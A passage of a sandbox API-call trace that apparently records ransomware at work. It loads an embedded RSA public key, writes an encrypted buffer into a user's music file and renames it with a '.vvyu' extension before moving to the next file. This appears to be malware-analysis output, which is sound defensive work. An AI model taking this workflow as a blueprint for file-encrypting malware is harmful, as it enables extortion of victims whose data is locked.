KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.138] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.138] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea898) returned 1 [0198.139] CryptCreateHash (in: hProv=0x6ea898, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0198.139] CryptHashData (hHash=0x2cbfad0, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0198.139] CryptGetHashParam (in: hHash=0x2cbfad0, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0198.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0198.140] CryptGetHashParam (in: hHash=0x2cbfad0, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0198.140] GetLastError () returned 0x0 [0198.140] CryptDestroyHash (hHash=0x2cbfad0) returned 1 [0198.140] CryptReleaseContext (hProv=0x6ea898, dwFlags=0x0) returned 1 [0198.140] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0198.140] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0198.140] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0198.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0198.140] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0198.140] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0198.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0198.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x123c0) returned 0x2d4f778 [0198.141] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0198.141] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0198.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0198.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0198.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0198.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0198.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d598 [0198.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4b0 [0198.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d5e0 [0198.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4c8 [0198.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4f8 [0198.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a558 [0198.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a510 [0198.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0198.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0198.142] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0198.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0198.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4f8 | out: hHeap=0x6a0000) returned 1 [0198.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a510 | out: hHeap=0x6a0000) returned 1 [0198.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a558 | out: hHeap=0x6a0000) returned 1 [0198.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0198.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0198.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a558 [0198.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37800 [0198.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a510 [0198.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0198.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a4f8 [0198.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0198.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0198.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0198.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0198.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0198.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0198.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0198.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0198.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0198.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a510 | out: hHeap=0x6a0000) returned 1 [0198.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0198.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4f8 | out: hHeap=0x6a0000) returned 1 [0198.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0198.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0198.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a558 | out: hHeap=0x6a0000) returned 1 [0198.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0198.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0198.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0198.145] GetCurrentThreadId () returned 0x264 [0198.145] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0198.145] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d4c240 [0198.145] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0198.145] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea898 [0198.145] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d4d790 [0198.145] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0198.145] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0198.145] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0198.145] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0198.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0198.146] GetCurrentThreadId () returned 0x264 [0198.146] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0198.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0198.146] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2c31700 [0198.146] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0198.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0198.146] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0198.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0198.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0198.147] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0198.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0198.147] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0198.147] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0198.147] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0198.147] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0198.147] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a558 [0198.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0198.147] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0198.147] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0198.147] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0198.147] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0198.147] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0198.147] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0198.148] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0198.148] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4f8 [0198.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0198.148] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0198.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0198.148] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0198.148] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0198.148] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0198.148] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0198.148] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a510 [0198.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0198.148] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0198.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0198.148] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4e0 [0198.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0198.148] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a570 [0198.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0198.148] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0198.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0198.148] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a540 [0198.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0198.148] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a528 [0198.149] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0198.149] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a588 [0198.149] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a528 | out: hHeap=0x6a0000) returned 1 [0198.149] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a528 [0198.149] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a540 | out: hHeap=0x6a0000) returned 1 [0198.149] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0198.149] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0198.149] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0198.149] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0198.149] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0198.149] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4f8 | out: hHeap=0x6a0000) returned 1 [0198.149] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a4f8 [0198.149] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0198.149] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0198.149] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a558 | out: hHeap=0x6a0000) returned 1 [0198.149] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0198.149] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a588 | out: hHeap=0x6a0000) returned 1 [0198.149] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0198.149] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0198.149] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0198.149] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0198.149] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bfe0 [0198.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4f8 | out: hHeap=0x6a0000) returned 1 [0198.150] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0198.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0198.150] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0198.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0198.151] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea898 | out: hHeap=0x6a0000) returned 1 [0198.151] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0198.151] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0198.151] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0198.151] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bfe0 | out: hHeap=0x6a0000) returned 1 [0198.152] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0198.152] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0198.152] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0198.152] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0198.152] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a528 | out: hHeap=0x6a0000) returned 1 [0198.152] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0198.152] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a570 | out: hHeap=0x6a0000) returned 1 [0198.153] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0198.153] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a510 | out: hHeap=0x6a0000) returned 1 [0198.153] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4e0 | out: hHeap=0x6a0000) returned 1 [0198.153] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4d790 | out: hHeap=0x6a0000) returned 1 [0198.153] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0198.154] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0198.154] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4c8 | out: hHeap=0x6a0000) returned 1 [0198.154] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2d5e0 | out: hHeap=0x6a0000) returned 1 [0198.154] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0198.154] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0198.155] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0198.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0198.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0198.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0198.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0198.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0198.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0198.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0198.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0198.161] WriteFile (in: hFile=0x52c, lpBuffer=0x2d4f778*, nNumberOfBytesToWrite=0x123bc, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d4f778*, lpNumberOfBytesWritten=0x30ffb14*=0x123bc, lpOverlapped=0x0) returned 1 [0198.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4f778 | out: hHeap=0x6a0000) returned 1 [0198.162] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x123c1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.162] WriteFile (in: hFile=0x52c, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0198.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0198.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0198.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0198.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0198.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0198.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0198.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0198.164] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0198.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0198.165] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0198.165] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0198.165] CloseHandle (hObject=0x52c) returned 1 [0198.167] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xd0) returned 0x2d4f790 [0198.167] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8e0) returned 0x2d3a670 [0198.167] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4f790 | out: hHeap=0x6a0000) returned 1 [0198.167] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\yw2t95\\RNqKcz9LI.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\61x to95hr3jmn6z\\yw2t95\\rnqkcz9li.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\yw2t95\\RNqKcz9LI.mp3.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\61x to95hr3jmn6z\\yw2t95\\rnqkcz9li.mp3.vvyu")) returned 1 [0198.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0198.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0198.170] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0198.173] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed503340, ftCreationTime.dwHighDateTime=0x1d89e53, ftLastAccessTime.dwLowDateTime=0x30d9dae0, ftLastAccessTime.dwHighDateTime=0x1d8a722, ftLastWriteTime.dwLowDateTime=0x30d9dae0, ftLastWriteTime.dwHighDateTime=0x1d8a722, nFileSizeHigh=0x0, nFileSizeLow=0x17c7b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rQWnqazpz-naoLL5P.wav", cAlternateFileName="RQWNQA~1.WAV")) returned 1 [0198.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0198.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11e) returned 0x2d31688 [0198.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0198.173] PathFindExtensionW 